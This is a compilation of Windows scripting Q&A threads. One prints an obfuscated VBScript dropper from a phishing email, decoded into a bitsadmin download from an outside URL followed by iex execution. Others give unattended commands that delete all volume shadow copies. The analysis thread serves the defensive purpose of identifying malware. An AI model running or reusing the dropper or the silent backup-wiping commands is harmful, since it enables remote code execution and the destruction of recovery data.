I am new to programming and need some help.. I need to write a powershell script and as part of it it needs to run an external executable... However I am having issues with the script not asking for an argument and even if I pass one it just seems to wait without asking anything.. so here is the part in question
#Part of my script
$app = "D:\project1\files\vshadow.exe"
$arg1 = "-da"
$arg2 = "Y"
& $app $arg1 $arg2v
+++++++++++++++++++++++++++++++++++++
This is what I get in the console
PS D:\project1\files> C:\Users\Administrator\Desktop\test.ps1
VSHADOW.EXE 3.0 - Volume Shadow Copy sample client.
Copyright (C) 2005 Microsoft Corporation. All rights reserved.
(Option: Delete all shadow copies)
+++++++++++++++++++++++++++++
so the .exe is to clear volume shadow copies with a -da flag (clear all).. however the step requires a Y to continue.. this when I run from cmd.exe
D:\project1\files>vshadow.exe -da
VSHADOW.EXE 3.0 - Volume Shadow Copy sample client.
Copyright (C) 2005 Microsoft Corporation. All rights reserved.
(Option: Delete all shadow copies)
This will delete all shadow copies in the system. Are you sure? [Y/N]
++++++++++++++++++++++++++++++
any help would be appreciated
Thanks,
Tom
Its doc says -da requires confirmation but does not provide a way to override. You might be able to pipe in the user input... Try this -
echo 'y' | cmd.exe /c vshadow.exe -da
I do not know of PowerShell being able to act like an Expect script.
That said, you may be able to get around the user input requirement of the -da option. Use a vshadow query to get all copies, then pipe to a foreach loop to do a vshadow delete (-ds).
Related
I tried to delete the vss shadow copies via cmd and it asks for a prompt y/n. How do I automatically answer yes?
This is the syntax:
echo y | vssadmin delete shadows /all > C:\Temp\VssDeleteDriveC.log
This is the result of the syntax entered:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Do you really want to delete 1 shadow copies (Y/N): [N]? N
this morning I received a mal containing, among other things, a file with the extension .wsf, on which I inadvertently clicked.
I immediately realized that I had made a mistake ... but too late :(
Can you tell me if it is malicious code?
Here is the code:
<package><job id="zXGYF_83"><script language="VBScript">
' Version: 10.7.91
'
' Copyright (c) Microsoft Corporation. All rights reserved.
'
' Windows Software Licensing Management Tool.
'
Set ISUaUv=WScript.CreateObject("WScript.Shell")
jpHg="&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im€$Qp($?krmvxW1xyS$€wp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
arr=split(jpHg,"dev")
For Each nEZVNX In arr
KcSOUa=""
fInEJ=Len(nEZVNX) - 1
For intI = 0 to fInEJ
KcSOUa=chr(Asc(Mid(nEZVNX,intI + 1 ,1 ))+0-4)+KcSOUa
Next
ISUaUv.run KcSOUa,false,-1
Next
</script></job></package>
Thank you!
The fact it obfuscates itself is a good indicator it maybe malicious, if you want to see what it's attempting to run you can;
Comment out this line (like below);
'ISUaUv.run KcSOUa,false,-1
Add this line below it;
WScript.Echo KcSOUa
When you run the script you will get this output;
Output:
powershell -c ""&bitsadmin /transfer rDIlrsRC https://imwithmark.com/omar/DFDLSS70S07M052Z/inter.xls %appdata%\inter.xls""
powershell -c & $lM=gc %appdata%\inter.xls| Out-String; $lM |iex
Judging by the first line, the script is using the BITSAdmin service (built into Windows) to initiate a download from the remote URL into a local XLS file stored inside your user profile AppData folder. As for the second, I'm not clear on what that does but someone with more PowerShell knowledge will be able to shed light on it.
Update
It looks to be using gc (Get-Content applet in PowerShell) to pull the content of the file into a string using the Out-String command. It then pipes this to iex (Invoke-Expression command) to be executed.
The likelihood is the inter.xls file that was downloaded contains malicious commands that are then being locally executed in the context of the local system. This is a classic script kiddie hack to get around remote code execution.
I have seen mentions in other places to a -regserver argument to cscript or wscript - but can't find any info that precisely defines what this option does or really clarifies when you'd want/need to use it.
Even the built-in help does not mention it:
λ cscript /?
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.
Usage: CScript scriptname.extension [option...] [arguments...]
Options:
//B Batch mode: Suppresses script errors and prompts from displaying
//D Enable Active Debugging
//E:engine Use engine for executing script
//H:CScript Changes the default script host to CScript.exe
//H:WScript Changes the default script host to WScript.exe (default)
//I Interactive mode (default, opposite of //B)
//Job:xxxx Execute a WSF job
//Logo Display logo (default)
//Nologo Prevent logo display: No banner will be shown at execution time
//S Save current command line options for this user
//T:nn Time out in seconds: Maximum time a script is permitted to run
//X Execute script in debugger
//U Use Unicode for redirected I/O from the console
and nor does Microsoft's documentation.
Note - I gather from some of the external articles I linked to that this option can be used to recover from some bugs in Windows XP and maybe also Vista. But that doesn't actually explain what this option DOES or why it exists. I don't think Microsoft added it after the fact as a FIX, but rather people could take advantage of it to address whatever those problems were in XP/Vista.
EDIT: Just because two questions have same/similar answers does not make them duplicates. The same information can answer multiple different questions. The question referred to as a potential duplicate doesn't have anything to do with the scripting executables. The value of THIS question is that someone using those tools can actually search and find an answer. They will not readily find the other one (as I did not when extensively searching/Googling before I posted this).
These are not actually unique arguments to cscript or wscript; rather they are standard arguments in Windows to any EXE which can act as a COM server.
See this related question for more details of how they operate: https://superuser.com/questions/1164298/what-actually-happens-during-regserver-unregserver
This is at least partly documented here:
If the server is packaged in an EXE module, the application wishing to
register the server launches the EXE server with the command-line
argument /RegServer or -RegServer (case-insensitive). If the
application wishes to unregister the server, it launches the EXE with
the command-line argument /UnregServer or -UnregServer.
The
self-registering EXE detects these command-line arguments and invokes
the same operations as a DLL would within DllRegisterServer and
DllUnregisterServer, respectively, registering its module path under
LocalServer32 instead of InprocServer32 or InprocHandler32.
How do I change the message that comes up automaticly when I start up CMD? The one where it says:"
Microsoft Windows [Version 6.0.6000]
Copyright (c) 2006 Microsoft Corporation.
How do I change that automatic message?..
By editing the cmd.exe. :) (That was a joke btw, don't really try that) If you look at a the cmd.exe in a hex editor, you will see that text in it. There is no easy way that I know of to change it.
Here is an ugly hack to emulate what you are wanting. First create a .cmd file that contains the following:
cmd /k init.bat
(cmd /k tells the computer to start an instance of cmd and run the parameter and not exit)
Then created your init.bat file with the following:
#echo off
cls
echo My message goes here
Then you just run your .cmd file instead of cmd.exe and you will get a command window with just your text at the top.
If I knew why you were wanting to do this, then maybe my answer could have been more specific to your needs.
You have to reverse engineer it :) Don't remember exactly how I did, but using a debugger single step until you find the place where it prints that out and edit it. I "hacked" it a bit more and it refuses doing anything, saying "do it yourself!" :)
Windows 7.
It's for my own machine, so it doesn't matter if it requires admin rights or something.
Preferably in Python or .NET, but I can learn a bit of Win32 (C/C++) programming if it's necessary.
if you want to permanently set environment variable, you can insert the new value into registry. eg with vbscript, add the path "c:\test" into PATH variable
Set WshShell = WScript.CreateObject("WScript.Shell")
strReg = "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path"
strSetting = WshShell.RegRead(strReg)
strNewSetting = strSetting&";c\test"
WshShell.RegWrite strReg, strNewSetting
So, if you use Python or other languages, you can do the same thing using your language's own api/modules to read and write registry
or you could try a Windows PowerShell script; PowerShell is installed on Windows 7 by default.
run powershell.exe
PS C:\> [Environment]::SetEnvironmentVariable("TestVariable", "Test value.", "User")
Then, for example, from cmd.exe
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\>echo %TestVariable%
Test value.
C:\>
Or (in a new) powershell.exe
PS C:\> echo $ENV:TestVariable
Test Value.
PS C:\>
check out http://technet.microsoft.com/en-us/library/ff730964.aspx
In C# the following creates a permanent environment variable:
Environment.SetEnvironmentVariable("foo", "bar", EnvironmentVariableTarget.Machine);
For anyone else looking for a quick commandline answer
SETX is available on windows servers (natively i think - http://technet.microsoft.com/en-us/library/cc755104.aspx )
Its also available in the Windows 7 and 8 toolkit.
Use the Environment class like this:
Environment.SetEnvironmentVariable("foo", "bar");
Programmatically modifying environment variables is only for the duration of the program. Have not heard of actually modifying the environment system-wide and making it effective there and then. I do not think that can be done, that would require poking around at privileged level and possibly messing with the core system to achieve that.
Even under Unix, it cannot be done despite some hacks to achieve it. I do remember seeing code that actually did modify the environment variables under MSDOS, by altering the MSDOS's _psp environment data structure, but that was a single-tasking system and 16bit with no protection whatsoever.
To sum up, I do not think you can and it would be unwise to do so, it could be perceived as if the system is under a threat by a 'trojan' or a 'virus' as a result if attempting to do so, not alone that, as a user, I would not like for a program to modify the system environment variable without my consent! Sure, a program can write to the registry to make it permanent, but I would still like to know what is the purpose of it and why.